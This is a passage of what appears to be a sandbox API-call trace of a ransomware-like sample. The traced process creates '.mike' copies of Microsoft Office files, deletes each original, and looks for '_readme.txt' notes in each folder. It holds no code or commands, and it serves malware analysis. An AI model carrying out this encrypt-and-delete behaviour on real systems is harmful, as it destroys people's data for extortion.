lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM.mike", lpFilePart=0x0) returned 0x45 [0077.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM", dwFileAttributes=0x80) returned 1 [0077.749] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\eurotool.xlam")) returned 1 [0077.753] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\_readme.txt", lpFilePart=0x0) returned 0x3e [0077.754] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.754] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.754] CoTaskMemFree (pv=0x506980) [0077.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.754] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis", lpFilePart=0x0) returned 0x3b [0077.758] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM.mike", lpFilePart=0x0) returned 0x4e [0077.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM.mike", lpFilePart=0x0) returned 0x4e [0077.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM.mike", lpFilePart=0x0) returned 0x4e [0077.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM", dwFileAttributes=0x80) returned 1 [0077.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\atpvbaen.xlam")) returned 1 [0077.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\_readme.txt", lpFilePart=0x0) returned 0x47 [0077.769] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM.mike", lpFilePart=0x0) returned 0x4d [0077.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM.mike", lpFilePart=0x0) returned 0x4d [0077.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM.mike", lpFilePart=0x0) returned 0x4d [0077.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM", dwFileAttributes=0x80) returned 1 [0077.776] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\funcres.xlam")) returned 1 [0077.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\_readme.txt", lpFilePart=0x0) returned 0x47 [0077.782] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM.mike", lpFilePart=0x0) returned 0x4c [0077.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM.mike", lpFilePart=0x0) returned 0x4c [0077.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM.mike", lpFilePart=0x0) returned 0x4c [0077.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM", dwFileAttributes=0x80) returned 1 [0077.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\procdb.xlam")) returned 1 [0077.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\_readme.txt", lpFilePart=0x0) returned 0x47 [0077.794] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.794] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.794] CoTaskMemFree (pv=0x506980) [0077.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.795] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\SOLVER.XLAM", dwFileAttributes=0x80) returned 1 [0077.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\SOLVER.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\solver\\solver.xlam")) returned 1 [0077.851] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.851] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.851] CoTaskMemFree (pv=0x506980) [0077.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.855] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\APPLAUSE.WAV", dwFileAttributes=0x80) returned 1 [0077.863] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\APPLAUSE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\applause.wav")) returned 1 [0077.865] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\ARROW.WAV", dwFileAttributes=0x80) returned 1 [0077.880] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\ARROW.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\arrow.wav")) returned 1 [0077.883] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BOMB.WAV", dwFileAttributes=0x80) returned 1 [0077.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BOMB.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\bomb.wav")) returned 1 [0077.905] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BREEZE.WAV", dwFileAttributes=0x80) returned 1 [0077.910] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BREEZE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\breeze.wav")) returned 1 [0077.912] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CAMERA.WAV", dwFileAttributes=0x80) returned 1 [0077.917] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CAMERA.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\camera.wav")) returned 1 [0077.920] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CASHREG.WAV", dwFileAttributes=0x80) returned 1 [0077.925] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CASHREG.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\cashreg.wav")) returned 1 [0077.928] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CHIMES.WAV", dwFileAttributes=0x80) returned 1 [0077.935] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CHIMES.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\chimes.wav")) returned 1 [0077.939] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CLICK.WAV", dwFileAttributes=0x80) returned 1 [0077.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CLICK.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\click.wav")) returned 1 [0077.946] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\COIN.WAV", dwFileAttributes=0x80) returned 1 [0077.950] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\COIN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\coin.wav")) returned 1 [0077.953] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\DRUMROLL.WAV", dwFileAttributes=0x80) returned 1 [0077.959] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\DRUMROLL.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\drumroll.wav")) returned 1 [0077.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\EXPLODE.WAV", dwFileAttributes=0x80) returned 1 [0077.971] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\EXPLODE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\explode.wav")) returned 1 [0077.974] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\HAMMER.WAV", dwFileAttributes=0x80) returned 1 [0077.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\HAMMER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\hammer.wav")) returned 1 [0077.981] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.985] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\LASER.WAV", dwFileAttributes=0x80) returned 1 [0077.985] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\laser.wav")) returned 1 [0077.989] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\PUSH.WAV", dwFileAttributes=0x80) returned 1 [0077.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\PUSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\push.wav")) returned 1 [0077.997] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\SUCTION.WAV", dwFileAttributes=0x80) returned 1 [0078.006] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\SUCTION.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\suction.wav")) returned 1 [0078.009] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\TYPE.WAV", dwFileAttributes=0x80) returned 1 [0078.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\TYPE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\type.wav")) returned 1 [0078.016] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\VOLTAGE.WAV", dwFileAttributes=0x80) returned 1 [0078.022] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\VOLTAGE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\voltage.wav")) returned 1 [0078.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WHOOSH.WAV", dwFileAttributes=0x80) returned 1 [0078.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\whoosh.wav")) returned 1 [0078.033] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WIND.WAV", dwFileAttributes=0x80) returned 1 [0078.038] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WIND.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\wind.wav")) returned 1 [0078.040] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0078.040] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0078.040] CoTaskMemFree (pv=0x506980) [0078.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.044] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml", dwFileAttributes=0x80) returned 1 [0078.048] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenote-pipelineconfig.xml")) returned 1 [0078.050] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0078.050] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0078.050] CoTaskMemFree (pv=0x506980) [0078.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML", dwFileAttributes=0x80) returned 1 [0078.060] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\ameritech.net.xml")) returned 1 [0078.062] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML", dwFileAttributes=0x80) returned 1 [0078.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btinternet.net.xml")) returned 1 [0078.070] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML", dwFileAttributes=0x80) returned 1 [0078.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btopenworld.com.xml")) returned 1 [0078.077] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML", dwFileAttributes=0x80) returned 1 [0078.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\flash.net.xml")) returned 1 [0078.084] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML", dwFileAttributes=0x80) returned 1 [0078.089] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nl.rogers.com.xml")) returned 1 [0078.094] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 